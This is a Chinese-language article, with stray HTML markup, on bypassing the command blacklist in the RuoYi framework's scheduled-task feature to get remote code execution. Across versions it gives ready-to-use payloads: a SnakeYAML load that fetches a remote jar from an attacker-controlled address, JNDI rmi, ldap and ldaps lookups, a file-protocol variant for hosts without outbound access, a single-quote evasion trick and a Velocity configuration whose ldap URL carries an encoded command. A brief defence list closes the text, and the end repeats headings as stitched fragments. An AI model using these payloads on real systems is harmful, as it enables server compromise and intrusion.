若依RCE黑名单绕过方法深度分析<\/h1>

一、若依RCE漏洞背景<\/h2>

若依框架存在两处RCE漏洞点：<\/p>

定时任务功能<\/li>

Thymeleaf模板注入<\/li> <\/ol>

本文重点分析定时任务功能的黑名单绕过方法。<\/p>

二、定时任务RCE原理<\/h2>

若依定时任务允许执行满足以下条件的类方法：<\/p>

具有无参构造方法<\/li>
调用的方法必须是类自身声明的方法（非父类方法）<\/li>

构造方法和调用的方法均为public<\/li> <\/ul>

三、不同版本利用方法<\/h2>

1. 版本<4.6.2<\/h3>

无任何限制，可直接使用公开POC：<\/p>

org.<\/span>yaml<\/span>.<\/span>snakeyaml<\/span>.<\/span>Yaml<\/span>.<\/span>load<\/span>(<\/span>'<\/span>!!<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>[!!<\/span>java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span>[[!!<\/span>java.<\/span>net<\/span>.<\/span>URL<\/span>[<\/span>"http:\/\/192.168.3.3:2333\/yaml-payload.jar"<\/span>]]]]<\/span>'<\/span>)<\/span>
<\/span><\/span>
<\/span><\/span>org.<\/span>springframework<\/span>.<\/span>jndi<\/span>.<\/span>JndiLocatorDelegate<\/span>.<\/span>lookup<\/span>(<\/span>'<\/span>rmi:<\/span>\/\/127.0.0.1:1099\/refObj')
<\/span><\/span><\/span><\/span>
<\/span><\/span>javax.<\/span>naming<\/span>.<\/span>InitialContext<\/span>.<\/span>lookup<\/span>(<\/span>'<\/span>ldap:<\/span>\/\/127.0.0.1:9999\/#Exploit')
<\/span><\/span><\/span><\/code><\/pre>不出网RCE方法<\/h4>
利用file协议实现不出网利用：<\/p>

上传任意后缀文件（若依提供上传接口）<\/li>
通过修改配置类设置上传路径<\/li>
使用file协议加载上传文件<\/li>
<\/ol>
com.<\/span>ruoyi<\/span>.<\/span>common<\/span>.<\/span>config<\/span>.<\/span>RuoYiConfig<\/span>.<\/span>setProfile<\/span>(<\/span>'<\/span>E:\/<\/span>test'<\/span>)<\/span>
<\/span><\/span>
<\/span><\/span>org.<\/span>yaml<\/span>.<\/span>snakeyaml<\/span>.<\/span>Yaml<\/span>.<\/span>load<\/span>(<\/span>'<\/span>!!<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>[!!<\/span>java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span>[[!!<\/span>java.<\/span>net<\/span>.<\/span>URL<\/span>[<\/span>"file:\/\/上传的绝对路径"<\/span>]]]]<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>2. 版本>=4.6.2且<4.7.2<\/h3>
黑名单限制：<\/p>

屏蔽ldap远程调用<\/li>
屏蔽http(s)远程调用<\/li>
屏蔽rmi远程调用<\/li>
<\/ul>
绕过方法<\/h4>
方法1：使用ldaps协议<\/strong><\/p>

在LDAP服务器上搭载SSL层<\/li>
实现LDAP注入（实现较复杂）<\/li>
<\/ul>
方法2：使用其他协议<\/strong><\/p>

ftp、file协议<\/li>
<\/ul>
方法3：单引号绕过<\/strong><\/p>

若依会将参数中的单引号替换为空<\/li>
在危险字符间加入单引号<\/li>
<\/ul>
org.<\/span>springframework<\/span>.<\/span>jndi<\/span>.<\/span>JndiLocatorDelegate<\/span>.<\/span>lookup<\/span>(<\/span>'r'<\/span>m'<\/span>i:<\/span>\/\/127.0.0.1:1099\/refObj')
<\/span><\/span><\/span><\/code><\/pre>方法4：JNDI Bypass<\/strong><\/p>

使用org.springframework.jdbc.datasource.lookup.JndiDataSourceLookup.getDataSource<\/code><\/li>
<\/ul>
org.<\/span>springframework<\/span>.<\/span>jdbc<\/span>.<\/span>datasource<\/span>.<\/span>lookup<\/span>.<\/span>JndiDataSourceLookup<\/span>.<\/span>getDataSource<\/span>(<\/span>'<\/span>ldaps:<\/span>\/\/xxx')
<\/span><\/span><\/span><\/code><\/pre>方法5：Velocity配置文件RCE<\/strong><\/p>

上传可控配置文件<\/li>
通过org.apache.velocity.runtime.RuntimeInstance#init<\/code>加载<\/li>
<\/ol>
配置文件示例：<\/p>
resource.loader = ds
ds.resource.loader.public.name = DataSource
ds.resource.loader.description = Velocity DataSource Resource Loader
ds.resource.loader.class = org.apache.velocity.runtime.resource.loader.DataSourceResourceLoader
ds.resource.loader.datasource_url = ldap:\/\/xxx:1389\/TomcatBypass\/Command\/Base64\/Y2FsYy5leGU=
ds.resource.loader.resource.table = tb_velocity_template
ds.resource.loader.resource.keycolumn = id_template
ds.resource.loader.resource.templatecolumn = template_definition
ds.resource.loader.resource.timestampcolumn = template_timestamp
ds.resource.loader.cache = false
ds.resource.loader.modificationCheckInterval = 60
<\/code><\/pre>
POC:<\/p>
org.<\/span>apache<\/span>.<\/span>velocity<\/span>.<\/span>runtime<\/span>.<\/span>RuntimeInstance<\/span>.<\/span>init<\/span>(<\/span>'<\/span>E:\/<\/span>ee.<\/span>txt<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>不出网RCE尝试<\/h4>
尝试使用com.sun.glass.utils.NativeLibLoader#loadLibrary<\/code>方法：<\/p>

需要上传.dll或.so文件<\/li>
若依无法上传这些后缀的文件<\/li>
<\/ul>
3. 版本4.7.3（最新版）<\/h3>
限制改为黑白名单：<\/p>

只能调用com.ruoyi包下的类<\/li>
暂无有效绕过方法<\/li>
<\/ul>
四、技术要点总结<\/h2>

协议利用<\/strong>：file、ldaps、ftp等协议在黑名单限制下仍可能有效<\/li>
字符绕过<\/strong>：利用单引号替换机制绕过黑名单检测<\/li>
配置文件注入<\/strong>：通过Velocity等框架的配置文件实现RCE<\/li>
版本差异<\/strong>：不同版本的黑名单限制不同，需针对性绕过<\/li>
不出网利用<\/strong>：关键在于文件上传和路径控制<\/li>
<\/ol>
五、防御建议<\/h2>

升级到最新版本（4.7.3及以上）<\/li>
严格控制文件上传功能<\/li>
对定时任务执行进行更严格的权限控制<\/li>
监控异常的文件操作和网络请求<\/li>
<\/ol>

若依RCE黑名单绕过方法深度分析<\/h1>

三、不同版本利用方法<\/h2>

五、防御建议<\/h2> 升级到最新版本（4.7.3及以上）<\/li> 严格控制文件上传功能<\/li> 对定时任务执行进行更严格的权限控制<\/li> 监控异常的文件操作和网络请求<\/li> <\/ol>

五、防御建议<\/h2>

升级到最新版本（4.7.3及以上）<\/li>
严格控制文件上传功能<\/li>
对定时任务执行进行更严格的权限控制<\/li>
监控异常的文件操作和网络请求<\/li> <\/ol>